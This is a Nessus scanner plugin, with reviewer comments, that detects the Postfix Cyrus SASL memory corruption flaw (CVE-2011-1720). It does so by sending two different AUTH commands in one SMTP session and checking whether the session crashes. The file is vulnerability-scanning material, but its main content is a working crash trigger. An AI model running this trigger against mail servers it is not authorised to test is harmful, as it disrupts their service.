
Postfix Cyrus SASL Authentication Context Data Reuse Memory Corruption (exploit)


The Postfix mail server listening on this port appears vulnerable to a memory corruption attack as Nessus was able to crash an SMTP session with this host by using two different authentication methods in one session.

Note that code execution as the unprivileged postfix user may also be possible.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Plugin registration. Everything in this block is metadata that the
# scanner reads when loading the script; no network activity happens here.
if (description)
{
  script_id(54584);
  script_version("1.8");
  script_cvs_date("Date: 2018/11/15 20:50:24");

  # External identifiers for the Postfix/Cyrus SASL issue this plugin checks.
  script_cve_id("CVE-2011-1720");
  script_bugtraq_id(47778);
  script_xref(name:"CERT", value:"727230");
  script_xref(name:"Secunia", value:"44500");

  script_name(english:"Postfix Cyrus SASL Authentication Context Data Reuse Memory Corruption (exploit)");
  script_summary(english:"Tries to crash SMTP session.");

  script_set_attribute(
    attribute:"synopsis", 
    value:
"The remote mail server is affected by a memory corruption
vulnerability."
  );
  # "appears vulnerable": the check only observes that the session stops
  # responding after the second AUTH; it cannot distinguish a crashed
  # worker from a dropped connection or timeout.
  script_set_attribute(
    attribute:"description", 
    value:
"The Postfix mail server listening on this port appears vulnerable to
a memory corruption attack as Nessus was able to crash an SMTP session
with this host by using two different authentication methods in one
session. 

Note that code execution as the unprivileged postfix user may also be
possible."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.postfix.org/CVE-2011-1720.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://seclists.org/bugtraq/2011/May/64"
  );
  script_set_attribute(
    attribute:"solution", 
    value:"Upgrade to Postfix 2.5.13 / 2.6.19 / 2.7.4 / 2.8.3 or later."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  # NOTE(review): "no known exploits" (E:U) sits next to
  # exploited_by_nessus:true below; presumably the former refers to a
  # public code-execution exploit while the latter only means this plugin
  # reproduces the crash. Worth confirming the intended reading.
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"vuln_publication_date", value:"2011/05/09");
  script_set_attribute(attribute:"patch_publication_date", value:"2011/05/09");
  script_set_attribute(attribute:"plugin_publication_date", value:"2011/05/19");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:postfix:postfix");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  # ACT_ATTACK: this is an active check that deliberately disrupts the
  # SMTP session it opens (see exploit() below), not a banner/version test.
  script_category(ACT_ATTACK);
  script_family(english:"SMTP problems");

  script_copyright(english:"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.");

  # The main body reads the smtp/<port>/auth and smtp/<port>/auth_tls KB
  # lists (presumably filled in by smtp_authentication.nasl) and only runs
  # once the service has been identified as Postfix (SMTP/postfix key).
  script_dependencies("smtp_authentication.nasl");
  script_require_ports("Services/smtp", 25);
  script_require_keys("SMTP/postfix");

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("smtp_func.inc");

# Resolve the SMTP service port (default 25); the plugin ends here when
# no such service is known for the host.
port = get_service(default:25, exit_on_fail:TRUE, svc:"smtp");

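# Open one SMTP session and issue two AUTH commands for different
# mechanisms, separated by an aborted exchange ("*"), then watch whether
# the server still answers.
#
# Parameters:
#   methods  - list of SASL mechanism names; only methods[0] and
#              methods[1] are used, so the caller must supply at least two.
#   port     - SMTP port to connect to.
#   starttls - when TRUE, negotiate STARTTLS before the session starts.
#
# Returns:
#   A list of "C: ..." / "S: ..." transcript lines when the server stopped
#   answering after the final AUTH (treated as a crash), or NULL when it
#   answered that command (not affected / not triggered).
#
# Exits the plugin (exit(1)) when the connection, STARTTLS, EHLO or any
# non-final command gets no usable response. Note that a silent server on
# the final command is indistinguishable here from a timeout or a dropped
# connection, which is why the report says "appears vulnerable".
function exploit(methods, port, starttls)
{
  local_var cmd, cmds, i, last, log, res, sock;

  # Connect to the service.
  sock = smtp_open(port:port);
  if (!sock) exit(1, "Failed to open socket on port " + port + ".");

  # Negotiate a StartTLS connection if supported.
  if (starttls)
  {
    sock = smtp_starttls(socket:sock, encaps:ENCAPS_TLSv1);
    if (!sock) exit(1, "StartTLS failed for socket on port " + port + ".");
  }

  # Initialize the SMTP session.
  send(socket:sock, data:'EHLO nessus\r\n');
  res = smtp_recv_line(socket:sock, code:250);
  if (isnull(res))
    exit(1, "The SMTP server on port " + port + " didn't respond to 'EHLO'.");

  # Send commands that should trigger a crash if vulnerable. Method names
  # come from the server's own advertised list (via the KB), so they are
  # echoed back to the same host only.
  log = make_list();
  cmds = make_list(
    "AUTH " + methods[0],
    "*",
    "AUTH " + methods[1]
  );

  for (i = 0; i < max_index(cmds); i++)
  {
    # Determine if this is the final iteration.
    last = (i == max_index(cmds) - 1);

    # Interact with the server.
    cmd = cmds[i];
    send(socket:sock, data:cmd + '\r\n');
    res = smtp_recv_line(socket:sock);
    if (isnull(res))
    {
      # Silence before the final command is a protocol problem, not a crash.
      if (!last)
        exit(1, "The SMTP server on port "+port+" failed to respond to '" + cmd + "'.");
      res = "*CRASH*";
    }
    else if (last)
    {
      # The session survived the second AUTH: release the socket before
      # reporting "not affected" (previously leaked on this path).
      close(sock);
      return NULL;
    }

    # Record the interaction.
    log = make_list(
      log,
      "C: " + cmd,
      "S: " + chomp(res)
    );
  }

  close(sock);

  return log;
}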

# Unless the scan is fully paranoid, only continue when the greeting
# banner identifies the server as Postfix; paranoid scans skip the banner
# check and attempt the exploit regardless.
if (report_paranoia < 2)
{
  banner = chomp(get_smtp_banner(port:port));
  if (isnull(banner))
    exit(1, "Failed to retrieve the banner from the SMTP server listening on port " + port + ".");
  if (!("Postfix" >< banner))
    exit(0, "The banner from the SMTP server listening on port " + port + " is not from Postfix.");
}

# Try the plaintext AUTH list first, then the one advertised after
# STARTTLS; stop as soon as one attempt produces a transcript.
log = NULL;
required_methods = FALSE;
foreach key (make_list("auth", "auth_tls"))
{
  # Authentication methods recorded in the KB for this channel.
  list = get_kb_list("smtp/" + port + "/" + key);
  if (isnull(list)) continue;

  # Keep everything except ANONYMOUS / LOGIN / PLAIN, in sorted order so
  # that CRAM-MD5 and DIGEST-MD5 (the most reliable triggers) come first.
  methods = make_list();
  foreach method (sort(list))
  {
    if (method != "ANONYMOUS" && method != "LOGIN" && method != "PLAIN")
      methods = make_list(methods, method);
  }

  # exploit() uses the first two entries, so fewer than two is a no-go.
  if (max_index(methods) < 2) continue;
  required_methods = TRUE;

  # The "auth_tls" list is exercised over a STARTTLS session.
  starttls = (key == "auth_tls");
  log = exploit(methods:methods, port:port, starttls:starttls);
  if (!isnull(log)) break;
}

# No transcript: either no usable method pair was found, or the server
# answered the final AUTH in every attempt.
if (isnull(log))
{
  if (!required_methods)
    exit(1, "The Postfix server on port " + port + " does not support at least two affected authentication methods.");
  exit(0, "The Postfix server on port " + port + " does not appear to be affected.");
}

# Report the finding, attaching the client/server transcript when the
# scan asks for verbose output.
if (report_verbosity > 0)
{
  report = '\nThe remote Postfix installation was exploited as follows : \n';
  foreach line (log) report += '  ' + line + '\n';
  security_warning(port:port, extra:report);
}
else security_warning(port);